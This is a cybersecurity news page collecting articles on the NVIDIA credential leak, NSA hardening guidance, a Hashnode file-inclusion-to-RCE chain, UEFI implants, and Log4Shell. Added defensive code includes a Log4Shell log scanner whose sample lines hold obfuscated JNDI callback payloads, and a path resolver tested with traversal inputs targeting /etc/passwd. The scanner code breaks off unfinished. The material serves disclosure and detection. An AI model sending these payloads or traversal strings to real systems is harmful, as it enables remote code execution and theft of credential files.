Monday, January 20, 2025

NVIDIA DataBreach: Credentials of 71,000 Employees Leaked

databreach

The email addresses and password hashes of more than 71,000 NVIDIA employees were likely stolen in a recent cyberattack and are now circulating within underground communities.


On February 23, hackers managed to compromise NVIDIA’s network and steal not only employee credentials but also proprietary information.

The Lapsus$ extortion group, which claimed responsibility for the attack and reportedly demanded $1 million from the chip maker for the stolen data, started leaking the compromised information over the weekend, saying the move was retaliation for NVIDIA’s alleged attempt to hack them back.

Earlier this week, the company confirmed that sensitive data was stolen in the incident, but provided no details on the number of impacted individuals or the manner in which its network was breached.

According to data breach monitoring website Have I Been Pwned, however, the hackers managed to exfiltrate the credentials of roughly 71,300 NVIDIA employees.

The attackers stole email addresses and NTLM password hashes, and were subsequently able to crack many of these, after which they made them available to other hacking community members.

As part of the incident, the hackers also appear to have stolen two expired code signing certificates.

According to Rochester Institute of Technology researcher Bill Demirkapi, “Windows still allows them to be used for driver signing purposes.”

Nvidia DataBreach: Response


NVIDIA said: “We do not anticipate any disruption to our business or our ability to serve our customers as a result of this incident.” Lapsus$, for its part, claimed that NVIDIA had managed to encrypt one of the group’s machines while the data was being exfiltrated, the alleged hack-back that the leak was meant to punish.

NVIDIA does not believe the attack is related to the conflict between Russia and Ukraine, and the group has also denied any political affiliation. In NVIDIA’s words: “We have no evidence of ransomware being deployed in the Nvidia environment or that this is related to the Russia-Ukraine conflict.”

Go to Cybersecurity Knowledge Base

Go to Cybersecurity News

Go to Homepage

Go to Cybersecurity Academy

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for RiSec Weekly Cybersecurity Newsletter Today

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.

NSA Publishes Top Practices for Improving Network Defenses

Cybersecurity

The National Security Agency (NSA) this week published a set of best practices for organizations looking to improve the overall security of their networks.

The guidance is meant to be generic, applicable to a broad range of network devices, and should help administrators prevent adversaries from exploiting their networks.

According to the NSA, organizations looking to ensure that a network is protected from threats and that resources are secured should implement multiple defensive layers and also adopt a zero-trust security model.

On network architecture, the NSA recommends placing security devices such as a border router and a next-generation firewall at the perimeter, putting publicly accessible systems and outbound proxies in a zone between firewalls, and deploying monitoring solutions, remote log servers and redundant devices inside the network.

Practices for Improving Network Defenses

Furthermore, the NSA notes in its Network Infrastructure Security Guidance that admins should group together similar systems within the network and isolate them into subnets, applying proper network segmentation to ensure that an adversary able to compromise the most exploitable devices in the environment cannot reach other systems as well.

“Operational technology, such as industrial control systems, typically need to be isolated from other information technology and high-risk networks like the Internet. This physical separation provides stronger protection because the intermediate device between subnets must be compromised for an adversary to bypass access restrictions,” the NSA says.

Network security best practices, the NSA says, also include implementing access restrictions to critical internal network devices and a network access control (NAC) solution, removing backdoor connections, and limiting and encrypting virtual private networks (VPNs).

Beyond architecture, administrators should configure authentication, authorization and accounting (AAA) properly and apply the principle of least privilege; secure administrative accounts with unique usernames and passwords; store credentials securely; and disable unused accounts.

The guidance also covers file system and boot management, keeping all software and operating systems up to date, and confirming that hardware in use is still supported by its vendor.

Remote logging and monitoring, along with secure remote management of network devices, should also be in place. Administrators are further advised to disable IP source routing, disable unused ports and any port-monitoring (mirror/SPAN) sessions that are not in use, and disable unnecessary network services.
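Most of the items above can be checked mechanically against a device's running configuration. What follows is an added example, not part of the NSA guidance or this article: a small linter that tests a configuration for source routing, small servers, the HTTP management server, AAA, a remote syslog destination, reversible enable passwords, unused ports that are not shut down, and VTY lines without an access-class or SSH-only transport. It assumes Cisco IOS-style syntax; the sample configuration, host name and addresses are constructed.

```python
"""Added example: lint a device configuration against several NSA checklist items.
Assumes Cisco IOS-style syntax; the sample configuration is constructed."""
import re

# (finding to report, regex some top-level line must match, regex no line may match)
GLOBAL_CHECKS = [
    ("IP source routing not disabled", r"no ip source-route$", None),
    ("AAA not enabled (aaa new-model missing)", r"aaa new-model$", None),
    ("no remote syslog destination (logging host)", r"logging host \S+", None),
    ("enable password not stored as a salted hash (use enable secret)",
     r"enable secret ", r"enable password "),
    ("HTTP management server enabled", r"no ip http server$", r"ip http server$"),
    ("TCP/UDP small servers enabled", None, r"service (tcp|udp)-small-servers$"),
]


def _blocks(config):
    """Yield (header, body_lines) for every top-level line; indented lines form its body."""
    header, body = None, []
    for raw in config.splitlines():
        if raw.startswith(" ") and header is not None:
            body.append(raw.strip())
        else:
            if header is not None:
                yield header, body
            header, body = raw.strip(), []
    if header is not None:
        yield header, body


def audit(config: str):
    """Return the list of findings; an empty list means every check passed."""
    top = [hdr for hdr, _ in _blocks(config)]
    findings = []
    for finding, required, forbidden in GLOBAL_CHECKS:
        ok = required is None or any(re.match(required, l) for l in top)
        bad = forbidden is not None and any(re.match(forbidden, l) for l in top)
        if not ok or bad:
            findings.append(finding)
    for header, body in _blocks(config):
        if header.startswith("interface "):
            # Approximation: an interface with no address is unused and should be shut down.
            if not any(l.startswith("ip address ") for l in body) and "shutdown" not in body:
                findings.append(f"{header}: unused port not shut down")
        elif header.startswith("line vty"):
            if not any(re.match(r"access-class \S+ in$", l) for l in body):
                findings.append(f"{header}: no access-class limiting management sources")
            if "transport input ssh" not in body:
                findings.append(f"{header}: transport input is not SSH-only")
    return findings


SAMPLE_CONFIG = """\
hostname edge-rtr-01
no service tcp-small-servers
no service udp-small-servers
service password-encryption
enable password cisco123
ip http server
aaa new-model
logging host 10.0.0.50
!
interface GigabitEthernet0/0
 description uplink
 ip address 203.0.113.2 255.255.255.252
!
interface GigabitEthernet0/1
 description spare
!
interface GigabitEthernet0/2
 shutdown
!
line vty 0 4
 transport input telnet ssh
 login authentication default
"""

if __name__ == "__main__":
    for finding in audit(SAMPLE_CONFIG):
        print("FAIL:", finding)
```

Run against the sample it reports six findings: source routing left enabled, a reversible enable password, the HTTP server, the spare interface that is not shut down, and two VTY problems (no access-class, Telnet still accepted). Real configurations need the checks tuned to the platform's syntax, but the shape of the tool, a required-pattern and forbidden-pattern list plus a few block-aware rules, carries over.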

“Along with essential maintenance functions, administrators play a critical role in defending networks against adversarial threats. Following this guidance will assist these network defenders with putting cybersecurity best practices into action, lowering the risk against compromise and ensuring a more secure and better protected network,” the NSA concludes.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has encouraged network architects, defenders, and administrators to review the NSA’s guidance to harden their networks.


Remote code execution vulnerability in Hashnode blogging platform

vulnerability

A remote code execution (RCE) attack chain caused by a local file inclusion bug in blogging platform Hashnode has been disclosed by security researchers.

On February 28, Aditya Dixit, a penetration tester and security engineer based in India, said in a security advisory that the RCE had been found in Hashnode, a blogging platform for the engineering and developer community.

Dixit experienced continual errors while attempting to import posts on Hashnode. After examining the issue in Burp Suite, he found coding errors and a local file inclusion (LFI) vulnerability that allowed users to fetch internal server files.

The issue was in Hashnode’s Bulk Markdown Importer, a feature that lets users upload a ZIP archive of Markdown (.md) posts.

Together with security researcher Adhyayan Panwar, Dixit was able to escalate the LFI to achieve RCE.

Using Burp Suite, the pair noticed that when a Markdown file referenced an image by a path that did not exist, the server returned a raw ENOENT (“no such file or directory”) error.

“From here, it was just a matter of connecting the dots to fetch the internal files from the server,” Dixit said.

“Instead of a non-existent path, we decided to give the location of an actual file like the /etc/passwd hoping it would give us the file contents in the response.”

Hiding in plain sight

Dixit and Panwar were able to download files directly and, now armed with user names and home directory paths from the passwd file, decided to “try” for RCE.

Turning this into remote code execution required the server’s real IP address and a way to authenticate to it. Dixit noted that SSH public and private keys are kept in well-known default locations under a user’s home directory, so it was possible to modify the payload to fetch a user’s private key.

The server was “hidden behind Cloudflare,” the pen tester says, so Panwar turned to the /proc/net/tcp file to find the real IP address. That file lists the kernel’s active TCP sockets; the addresses are stored as hex values, but a few lines of code convert them into readable form, exposing the IP address and port number.

Panwar told The Daily Swig that /proc/net/tcp can provide crucial information about internal ports, giving investigators a “broader attack surface”. It was a user on an infosec Discord server who suggested checking the file for the information needed to complete the RCE chain.

“We had never looked at it from a perspective of retrieving IP addresses,” the researcher said. “It contained a list of all the connections that were active on the server, with a list of local and remote addresses. We could identify three local addresses: one was localhost, one was their intranet IP and one was [a] public IP, which allowed SSH connections.”

An attacker holding the private key and the server’s real address could SSH in and execute code on the server.
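The hex-to-address conversion the researchers describe is short but has one trap: the kernel prints each IPv4 address as a 32-bit value in host byte order, so on an x86 server the four bytes appear reversed, while the port is ordinary big-endian hex. The following is an added example, not the researchers’ code, that parses /proc/net/tcp, decodes the endpoints and sorts listeners into the three classes they mention (loopback, intranet, public). The sample content is constructed and uses documentation and private address ranges in place of real hosts; it assumes a little-endian kernel.

```python
"""Added example: decode /proc/net/tcp to recover a host's real listening addresses.
Sample content is constructed; assumes a little-endian (x86) kernel."""
import ipaddress

TCP_STATES = {0x01: "ESTABLISHED", 0x02: "SYN_SENT", 0x03: "SYN_RECV", 0x04: "FIN_WAIT1",
              0x05: "FIN_WAIT2", 0x06: "TIME_WAIT", 0x07: "CLOSE", 0x08: "CLOSE_WAIT",
              0x09: "LAST_ACK", 0x0A: "LISTEN", 0x0B: "CLOSING"}
PRIVATE = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def decode_endpoint(field: str):
    """'0100007F:0016' -> ('127.0.0.1', 22). The address is a host-order 32-bit hex
    value (bytes reversed on little-endian hosts); the port is big-endian hex."""
    addr_hex, port_hex = field.split(":")
    ip = ipaddress.IPv4Address(bytes.fromhex(addr_hex)[::-1])
    return str(ip), int(port_hex, 16)


def parse_proc_net_tcp(text: str):
    rows = []
    for line in text.splitlines()[1:]:              # line 0 is the column header
        fields = line.split()
        if len(fields) < 4:
            continue
        rows.append({
            "local": decode_endpoint(fields[1]),
            "remote": decode_endpoint(fields[2]),
            "state": TCP_STATES.get(int(fields[3], 16), fields[3]),
        })
    return rows


def classify(ip: str) -> str:
    """Split addresses the way the researchers did: loopback, intranet, or public."""
    a = ipaddress.IPv4Address(ip)
    if a.is_loopback:
        return "loopback"
    if a.is_link_local or any(a in n for n in PRIVATE):
        return "intranet"
    return "public"


def public_listeners(rows):
    """Listening sockets bound to a non-private address: the host's reachable IP:ports."""
    hits = {r["local"] for r in rows
            if r["state"] == "LISTEN" and classify(r["local"][0]) == "public"}
    return sorted(hits)


# Constructed: MySQL on loopback, a web server on an intranet address, SSH on a
# public (documentation-range) address, plus one established SSH session.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 0100007F:0CEA 00000000:0000 0A 00000000:00000000 00:00000000 00000000   108        0 18231 1 0000000000000000 100 0 0 10 0
   1: 0A00000A:0050 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 18402 1 0000000000000000 100 0 0 10 0
   2: 0A7100CB:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 17990 1 0000000000000000 100 0 0 10 0
   3: 0A7100CB:0016 076433C6:C822 01 00000000:00000000 02:000A3B2C 00000000     0        0 22145 2 0000000000000000 20 4 30 10 -1
"""

if __name__ == "__main__":
    rows = parse_proc_net_tcp(SAMPLE_PROC_NET_TCP)
    for r in rows:
        print(f"{r['local'][0]}:{r['local'][1]:<5} <- {r['remote'][0]}:{r['remote'][1]:<5} "
              f"{r['state']} ({classify(r['local'][0])})")
    print("public listeners:", public_listeners(rows))
```

On a real box /proc/net/tcp6 has the same layout with 128-bit addresses written as four host-order 32-bit words, and /proc/net/udp is worth reading for the same reason. For defenders the lesson is the same one the researchers draw: a file-read primitive that reaches /proc is a reconnaissance primitive, and restricting what an application user can read (or running it in a mount namespace with a minimal /proc) limits what an LFI can turn into.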

Key rotation

The Hashnode team was informed of the researchers’ findings on February 8. Hashnode told The Daily Swig that “the vulnerability was associated with one of our legacy components and was fixed pretty much immediately. We also rotated all of our keys immediately.”

Dixit commented: “Even though we were able to get the private key for the user, we could not SSH into the server because according to Hashnode, there was IP address whitelisting to prevent unauthorized access”.

“We did not actually try to log in when we got the key because of obvious reasons. But in cases where the admins have not implemented any IP whitelisting [allow listing] or firewalls, this can definitely lead to a full server compromise.”

“The takeaway from our exploit would be to never display descriptive messages to the end-users and always have input validation in place on all the input parameters,” the researcher added. “It’s a really bad idea to trust your users’ inputs.”
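The two halves of that takeaway, input validation and non-descriptive errors, map directly onto the importer bug described above, where an image path from the Markdown was handed to the filesystem as-is and the resulting ENOENT was passed back to the user. The following is an added example, not Hashnode’s code: a path resolver of the vulnerable shape beside one that confines every reference to the unpacked import directory and returns the same generic message for every failure. The import root, the file names and the in-memory stand-in for the server’s disk are constructed so the example runs offline.

```python
"""Added example: unconfined vs confined resolution of image paths from imported Markdown.
IMPORT_ROOT, FAKE_FS and the file names are constructed for the example."""
import posixpath

IMPORT_ROOT = "/srv/imports/job-42"          # hypothetical location of the unpacked ZIP

# Stand-in for the server's disk so the example runs offline.
FAKE_FS = {
    "/etc/passwd": "root:x:0:0:root:/root:/bin/bash\nhashnode:x:1000:1000::/home/hashnode:/bin/bash\n",
    IMPORT_ROOT + "/img/logo.png": "<png bytes>",
}


def vulnerable_resolve(image_ref: str) -> str:
    """Joins the reference straight onto the import root. posixpath.join discards the
    root when the reference is absolute, and normpath (like the kernel) honours '..'."""
    return posixpath.normpath(posixpath.join(IMPORT_ROOT, image_ref))


def safe_resolve(image_ref: str):
    """Return a path inside IMPORT_ROOT, or None when the reference would escape it."""
    if not image_ref or image_ref.startswith("/") or "\x00" in image_ref:
        return None
    candidate = posixpath.normpath(posixpath.join(IMPORT_ROOT, image_ref))
    if not candidate.startswith(IMPORT_ROOT + "/"):
        return None
    return candidate


def vulnerable_import(image_ref: str) -> str:
    path = vulnerable_resolve(image_ref)
    if path not in FAKE_FS:
        # Passing the OS error through is what exposed the bug in the first place.
        return f"ENOENT: no such file or directory, open '{path}'"
    return FAKE_FS[path]


def safe_import(image_ref: str) -> str:
    path = safe_resolve(image_ref)
    if path is None or path not in FAKE_FS:
        return "Import failed: invalid image reference"     # same message for every failure
    return FAKE_FS[path]


if __name__ == "__main__":
    for ref in ("img/logo.png", "/etc/passwd", "../../../etc/passwd", "missing.png"):
        print(f"{ref!r:28} vulnerable -> {vulnerable_import(ref)[:40]!r}")
        print(f"{'':28} safe       -> {safe_import(ref)[:40]!r}")
```

The prefix check on the normalised path is the validation; the single error string is the non-descriptive message. Two caveats for a real importer: normpath does not follow symlinks, so the archive must be unpacked with symlinks, absolute names and `..` components rejected (or the final path run through os.path.realpath and re-checked), and the process that serves imports should not have read access to /etc/passwd or /proc in the first place.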


MoonBounce Malware Hides In Your BIOS Chip, Persists After Drive Formats


A new type of malware takes a decidedly more stealthy and hard-to-remove path into your OS — it hides in your BIOS chip and thus remains even after you reinstall your OS or format your hard drive.

Kaspersky has observed the growth of Unified Extensible Firmware Interface (UEFI) firmware malware threats since 2019, with most storing malware on the EFI System Partition of the PC’s storage device. However, a more sinister development had earlier been spotted in Kaspersky’s firmware scanner logs: a new UEFI malware that implants malicious code into the motherboard’s Serial Peripheral Interface (SPI) flash. The security researchers have dubbed this flash-resident UEFI malware ‘MoonBounce’.

Dangerous MoonBounce Malware

MoonBounce isn’t the first UEFI malware discovered in the wild that targets SPI flash. Kaspersky says that the likes of LoJax and MosaicRegressor came before it. However, MoonBounce shows “significant advancement, with a more complicated attack flow and greater technical sophistication.” It also seems to have infected a machine remotely.

MoonBounce is undeniably clever in the way it gets into a system and makes itself hard to detect and dispose of. “The source of the infection starts with a set of hooks that intercept the execution of several functions in the EFI Boot Services Table,” explains Kaspersky on its SecureList blog. The hooks are then used to divert function calls to the malicious shellcode that the attackers have appended to the CORE_DXE image. This, in turn, “sets up additional hooks in subsequent components of the boot chain, namely the Windows loader,” said the security researchers. This allows the malware to be injected into an svchost.exe process when the computer boots into Windows.

Magic marker values replaced during execution within shellcodes in MoonBounce. (Image credit: Kaspersky Labs)

Transport Technology Company the Only Logged Attack so Far

Of course, Kaspersky was interested to see what the malware would do next. On an infected machine, the researchers observed the malware process try to access a URL to fetch the next-stage payload and run it in memory. Interestingly, this part of the attack did not seem to go anywhere, so it was not possible to analyze any further steps in MoonBounce. Perhaps the malware was still in testing when it was spotted, and/or it is being held back for special purposes. In addition, the malware is not file-based and does at least some of its operations only in memory, making it hard to see exactly what MoonBounce did on the single host PC on the company’s network.

A single machine, owned by a transportation company, seems to be the only machine on Kaspersky’s logs that has a MoonBounce infection in its SPI Flash. It isn’t certain how the infection took place, but it is thought it was instigated remotely. That sole machine at a transport technology company seems to have spread non-UEFI malware implants to other machines on the network. With much of its work being file-less and memory resident only, it isn’t easy to observe from this single sample.

Below, a flow chart breaks down how MoonBounce boots and deploys from the moment your UEFI PC is switched on, through Windows loading, and into being a usable but infected PC.

(Image credit: Kaspersky Labs)

APT41 Fingerprints Detected

Another important branch of the work done by security researchers like Kaspersky is looking into who is behind the malware that it discovers, what the purposes of the malware are, and what specific targets the malware is primed for.

Concerning MoonBounce, Kaspersky seems pretty certain that this malware is the product of APT41, “a threat actor that’s been widely reported to be Chinese-speaking.” In this case, the smoking gun is a “unique certificate” that the FBI has previously reported as signaling the use of APT41-owned infrastructure. APT41 has a history of supply chain attacks, so this is a continuation of a central thread of APT41’s nefarious operations.

Safety Measures

To help avoid falling victim to MoonBounce or similar UEFI malware, Kaspersky suggests a number of measures: keep UEFI firmware updated directly from the manufacturer, verify that Intel Boot Guard is enabled where available, and enable the Trusted Platform Module (TPM). Last but not least, it recommends a security solution that scans system firmware so that action can be taken when UEFI malware is detected.

Go to original article


U.S. Gov Issues Stark Warning, Calling Firmware Security a ‘Single Point of Failure’


U.S. government warns that firmware presents “a large and ever-expanding attack surface.”

The U.S. government, at the very highest levels, is calling attention to major weaknesses in the firmware supply chain, warning that the layer below the operating system is fertile ground for devastating hacker attacks.

A new joint draft report issued by leadership of the U.S. Department of Homeland Security (DHS) and Department of Commerce said firmware presented “a large and ever-expanding attack surface” for malicious hackers to subvert the core of modern computing.

“Securing the firmware layer is often overlooked, but it is a single point of failure in devices and is one of the stealthiest methods in which an attacker can compromise devices at scale.”

“Attackers can subvert OS and hypervisor visibility and bypass most security systems, hide, and persist in networks and devices for extended periods of time while conducting attack operations, and inflict irrevocable damage,” the two agencies said following a one-year assessment of the supply chains for critical IT infrastructure deployed in the United States.

“Firmware can also be a lucrative target with a relatively low cost of attack. Over the past few years, hackers have increasingly targeted firmware to launch devastating attacks.”

The whopping, 96-page report (PDF), published to support the Biden Executive Order on securing America’s supply chains, warned that firmware’s privileged position in the computing stack gives stealthy attackers a major advantage.

Despite its essential role in electronic devices, the agencies insisted that firmware security “has not traditionally been a high priority for manufacturers or users and is not always well protected.” 

During the assessment, the agencies found that firmware on items such as network cards, Wi-Fi adapters and USB hubs is often not properly signed with a vendor key at all.

“These devices have no way to verify that the operating firmware is authentic and can be trusted.”

Even worse, the agencies called special attention to the fact that OEMs and computer makers outsource firmware development to third party suppliers.  “[This] introduces risks related to the lack of transparency into suppliers’ programming and cybersecurity standards.”

The government’s warning comes as threat hunters spot signs that nation-state APT actors are using UEFI firmware implants to maintain stealthy infections and survive reboots and OS reinstallations.  The notorious FinSpy surveillance spyware toolkit was also fitted with a bootkit to conduct stealthy infections.

In the report, the agencies also warned of “complex supply chains” that compound the problems securing firmware deployments.

“In PC production, for example, the OEMs are typically responsible for firmware and the rest of the PC platform elements. However, many OEMs outsource firmware development to third-party suppliers where OEMs may not have visibility into their cybersecurity hygiene. Even if OEMs establish security standards, they may not be able to enforce supplier security protocols across a wide range of components and sub-suppliers,” the government agencies warned.

The report also noted that individual OEM vendors may modify the firmware based on device needs once the firmware has been delivered to the OEM. “This can lead to confusion about what party is ultimately responsible for firmware integrity and who is to supply customer updates.” 

“In addition, as devices and firmware change, OEMs often contract with different firmware developers, which can lead to delays or a lack of any update when older devices require updating and the original developer is not available. All of these factors can leave firmware open to malicious attacks,” the report said.

The agencies also called attention to the pain-point of applying firmware updates. “A firmware’s update process and capability vary by device. Some devices receive regular firmware updates. Some may only receive one update over their lifetimes, while others may never receive an update.”

Even worse, the process to install firmware updates is not simple, leading to skipped patches for critical-level vulnerabilities. 

“Firmware updates present a major logistical challenge for many enterprises,” the agencies said. “In many instances, device firmware is never updated or may only be updated in an emergency. In addition, vendors may only supply firmware updates if driven by an incident or identified vulnerability.”


Prolific Chinese APT Caught Using MoonBounce UEFI Firmware Implant


Threat hunters at Kaspersky have spotted a well-known Chinese APT actor using a UEFI implant to maintain stealthy persistence across reboots, disk formatting or disk replacements.

The discovery is another confirmation that apex threat actors are already deploying hard-to-detect malware below the operating system and the connection to a Chinese APT actor is an ominous sign firmware implantation may already be widespread.

A detailed technical analysis (download PDF) from Kaspersky’s global research team documents the ‘MoonBounce’ UEFI firmware implant and its connection to APT41 (also known as Winnti), a prolific threat actor that is known to carry out Chinese state-sponsored espionage activity.

Kaspersky researchers said the below-the-OS compromise was originally flagged by firmware scanning technology built into its products to spot signs of rootkit infections. Upon inspection, researchers discovered that a single component within the firmware image was modified by attackers in a way that allowed them to intercept the original execution flow of the machine’s boot sequence and introduce a sophisticated infection chain.

The initial UEFI infection vector is not yet known, but Kaspersky discovered that the attacker added malicious shellcode and a kernel-mode driver into a newly created section within the compromised firmware image to commandeer the infected machine’s boot routine.

“Due to its emplacement on SPI flash which is located on the motherboard instead of the hard disk, the implant is capable of persisting in the system across disk formatting or replacement,” Kaspersky said in the report.

The researchers say the purpose of the implant is to manage the deployment of user-mode malware that stages execution of further payloads downloaded from the internet.

“The infection chain itself does not leave any traces on the hard drive, as its components operate in memory only, thus facilitating a fileless attack with a small footprint,” Kaspersky noted, warning that other non-UEFI implants were discovered in the targeted network communicating with the same infrastructure that hosted the staging payload.

Kaspersky said its global detection data shows the attack was extremely targeted and was seen in one solitary case and said the targeting corresponds to an organization in control of several enterprises dealing with transport technology.

The MoonBounce discovery is the third publicly documented case of firmware-based rootkit implantation. Just last year, researchers found signs the FinSpy surveillance spyware tool was fitted with a UEFI bootkit and ESET found similar capabilities in a cyberespionage campaign.

“MoonBounce marks a particular evolution in this group of threats by presenting a more complicated attack flow in comparison to its predecessors and a higher level of technical competence by its authors, who demonstrate a thorough understanding of the finer details involved in the UEFI boot process,” Kaspersky said.

As a safety measure against this attack and similar ones, Kaspersky recommends that users update UEFI firmware regularly and verify that Intel Boot Guard, where applicable, is enabled.

The company also suggests enabling the Trusted Platform Module (TPM) and deploying a security product that offers visibility into firmware images.


FinSpy Surveillance Spyware Fitted With UEFI Bootkit


Security researchers at Kaspersky have spotted signs of the notorious FinSpy surveillance spyware hijacking — and replacing — the Windows UEFI bootloader to perform stealthy infections on target machines.

This method of infection allowed the attackers to install a bootkit without the need to bypass firmware security checks and serves as confirmation that the controversial vendor of “lawful interception” spyware has modernized operations to remain undetected.

“UEFI infections are very rare and generally hard to execute, they stand out due to their evasiveness and persistence,” according to Kaspersky’s Igor Kuznetsov and Georgy Kucherin. “While in this case the attackers did not infect the UEFI firmware itself, but its next boot stage, the attack was particularly stealthy as the malicious module was installed on a separate partition and could control the boot process of the infected machine.”

In a research paper documenting what it calls “unseen findings” related to FinSpy, Kaspersky said the spyware has been tweaked since 2018 to add multiple checks to avoid the prying eyes of security researchers.

“[This is] one of the hardest-to-detect spywares to date,” the researchers said, noting that the spyware has now been fitted with four different levels of obfuscation in addition to the UEFI bootkit vector.

Unlike previous FinSpy versions that contained the Trojan in the infected application immediately, Kaspersky found the new samples are now protected by two components: a non-persistent pre-validator and a post-validator. 

“The first component runs multiple security checks to ensure that the device it is infecting does not belong to a security researcher. Only when the checks pass, is the post-validator component provided by the server – this component ensures that the infected victim is the intended one. Only then would the server command deployment of the full-fledged Trojan platform,” Kaspersky said.

The spyware features four complex custom-made obfuscators meant to slow down the analysis of the spyware. On top of that, the Trojan is capable of using the developers’ mode in browsers to intercept traffic protected with the HTTPS protocol.

“The amount of work put into making FinFisher not accessible to security researchers is particularly worrying and somewhat impressive,” Kuznetsov said. “It seems like the developers put at least as much work into obfuscation and anti-analysis measures as in the Trojan itself. As a result, its capabilities to evade any detection and analysis make this spyware particularly hard to track and detect,” he added.

Kuznetsov said the UEFI infection scenario was clever and straightforward. “All machines infected with the UEFI bootkit had the Windows Boot Manager (bootmgfw.efi) replaced with a malicious one. When the UEFI transfers execution to the malicious loader, it first locates and replaces the original Windows Boot Manager with a patched version capable of bypassing all security checks.”

On older machines that do not support UEFI, Kaspersky observed infections through the MBR (Master Boot Record).  

The Kaspersky research comes at a sensitive time for commercial spyware vendors who exploit zero-days in major software products to infect every type of computing device, from iPhones to Android devices to Windows, macOS and Linux machines.

While these companies claim the surveillance tools are only sold to licensed governments and law enforcement agencies, researchers have published evidence of abuse with targets including government critics, dissidents, journalists and social workers.


Log4Shell flaw: Still being used for crypto mining, botnet building… and Rickrolls


Log4Shell is still a threat, but the flaw is currently being used mostly for crypto mining and knocking out websites.

Nearly three months on, at the time of writing, Log4Shell, the critical bug in Apache’s widely used Log4j project, hasn’t triggered the disaster that was feared, but it’s still being exploited and predominantly from cloud computers in the US. 

The Log4Shell vulnerability came to light in December and sparked concern that it would be exploited by attackers because it was relatively easy to do and because the Java application logging library is embedded in many different services.

Microsoft has observed Log4Shell being used by state-sponsored and criminal attacks but early on found it was mostly being used for coin mining and ransomware. It advised customers to “assume broad availability of exploit code and scanning capabilities to be a real and present danger to their environments.”

The Cybersecurity and Infrastructure Security Agency warned that, while it had not seen any major breach happen due to the flaw, attackers might be waiting to use access gained through Log4Shell until alert levels fall. Oracle, Cisco, IBM and VMware have spent the past two months releasing patches for affected software.

Barracuda Networks, a maker of network security appliances, now says that Log4Shell attacks are continuing at a consistent level, but it has not found evidence of an onslaught of attacks.

“The majority of attacks came from IP addresses in the U.S., with half of those IP addresses being associated with AWS, Azure and other data centers. Attacks were also being sent from Japan, Germany, Netherlands, and Russia,” it notes.

It adds that these IP addresses are linked to scans and attempted intrusions, which means the activity could come from researchers as well as attackers.

The payloads range from trivial internet memes to the somewhat more serious category of crypto-mining malware, which uses someone else’s hardware to mine cryptocurrency such as Monero for the attacker.

One, for example, attempts to deliver a “relatively benign (or depending on your viewpoint, very annoying) payload” in the form of a YouTube video that plays Rick Astley’s “Never Gonna Give You Up.”

“I do wonder if anyone was actually Rick-Rolled by this one. It is, as noted earlier, a benign payload in my opinion, but one that will get you patching very quickly!” says Barracuda’s Tushar Richabadas.

Other notable malware Barracuda reports being used in connection with Log4Shell includes the distributed denial of service (DDoS) malware called BillGates, an old piece of malware that targets Linux machines and has no connection with Microsoft’s co-founder. Log4Shell has also been used to deploy the Mirai DDoS malware, which is often used in feuds between online gamers.

Barracuda has also seen Log4Shell being used to deploy the crypto miners Kinsing and XMRig, as well as the Muhstik DDoS malware.

Overall, Barracuda’s report suggests there is no change in the threat level from Log4Shell compared with January.
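Barracuda counts these attacks by spotting the JNDI lookup string in inbound requests. The scanner below is an added example written for this page, not Barracuda’s or the Log4j project’s code: it reads constructed web-server access-log lines (the addresses are RFC 5737 documentation ranges), unwraps the `${lower:…}` and `${…:-x}` lookup tricks attackers use to hide the literal `jndi`, and reports the client, the JNDI scheme and the callback host for each probe. The `SAMPLE_LOG` contents, the `normalize`/`scan_line`/`scan_log` names and the set of obfuscation forms handled are this example’s own assumptions.

```python
import re
from typing import List, Optional

# Constructed sample access-log lines (combined log format, not from the article).
# Three carry a Log4Shell probe (one plain, two obfuscated); the last is benign.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2022:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.9:1389/a}"
203.0.113.8 - - [10/Mar/2022:10:01:03 +0000] "GET /?x=${${lower:j}ndi:${lower:l}dap://198.51.100.9:1389/b} HTTP/1.1" 404 0 "-" "curl/7.68.0"
203.0.113.9 - - [10/Mar/2022:10:01:04 +0000] "GET /login HTTP/1.1" 200 1024 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://198.51.100.9:1099/c}"
198.51.100.20 - - [10/Mar/2022:10:01:05 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Log4j lookup forms used to hide the literal string "jndi" from naive pattern matching:
#   ${lower:J} / ${upper:j}   -> case-conversion lookups
#   ${::-j}, ${env:NOPE:-j}   -> a lookup that fails and falls back to its default value
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")

# Once unwrapped, a probe reads ${jndi:<scheme>:...}; the callback follows as //host:port/...
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)
_CALLBACK = re.compile(r"//([^/}\s\"]+)")


def normalize(s: str) -> str:
    """Resolve nested case/default lookups innermost-first until nothing changes."""
    prev = None
    while prev != s:
        prev = s
        s = _CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(), s)
        s = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), s)
    return s


def scan_line(line: str) -> Optional[dict]:
    """Return a finding for one access-log line, or None if it carries no JNDI lookup."""
    norm = normalize(line)
    m = _JNDI.search(norm)
    if m is None:
        return None
    cb = _CALLBACK.match(norm, m.end())
    return {
        "client": line.split(" ", 1)[0],          # first field of a combined-format line
        "scheme": m.group(1).lower(),              # ldap, rmi, dns, ...
        "callback": cb.group(1) if cb else None,   # attacker's listener host:port
        "obfuscated": norm != line,                # True when a lookup had to be unwrapped
    }


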